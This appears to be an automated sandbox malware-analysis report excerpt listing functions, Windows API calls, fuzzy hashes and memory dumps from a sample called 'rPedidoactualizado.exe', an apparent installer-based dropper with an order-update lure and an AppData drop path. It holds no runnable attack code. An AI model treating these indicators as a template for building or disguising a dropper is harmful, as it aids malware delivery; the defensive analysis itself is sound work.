Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4

Function 00406104 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,: Completed,?), ref: 00406128

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29

Function 0040425A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D

Function 00404243 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

Function 00403324 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19

Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,759223A0), ref: 0040535A
Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D

Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755

Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE

Non-executed Functions

Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C93
GetDlgItem.USER32(?,00000408), ref: 00404C9E
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
LoadBitmapW.USER32(0000006E), ref: 00404CFB
SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
DeleteObject.GDI32(00000000), ref: 00404D71
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
ShowWindow.USER32(?,00000005), ref: 00404ECB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
GlobalFree.KERNEL32(00000000), ref: 004050AB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
ShowWindow.USER32(?,00000000), ref: 0040524A
GetDlgItem.USER32(?,000003FE), ref: 00405255
ShowWindow.USER32(00000000), ref: 0040525C

Strings

M, xrefs: 00404E25
, xrefs: 00405234
N, xrefs: 00404F06

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58

Function 004046FF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040474E
SetWindowTextW.USER32(00000000,?), ref: 00404778
SHBrowseForFolderW.SHELL32(?), ref: 00404829
CoTaskMemFree.OLE32(00000000), ref: 00404834
lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 00404866
lstrcatW.KERNEL32(?,: Completed), ref: 00404872
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884

Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4

Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5

GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962

Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78

Strings

A, xrefs: 00404822
: Completed, xrefs: 00404860, 00404865, 00404870
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 0040484F

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 2624150263-2682436269
Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
